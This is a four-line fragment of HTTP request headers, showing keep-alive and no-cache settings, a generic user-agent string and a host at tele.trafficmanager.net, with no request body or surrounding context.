Connection: Keep-Alive
Pragma: no-cache
User-Agent: client connection
Host: tele.trafficmanager.net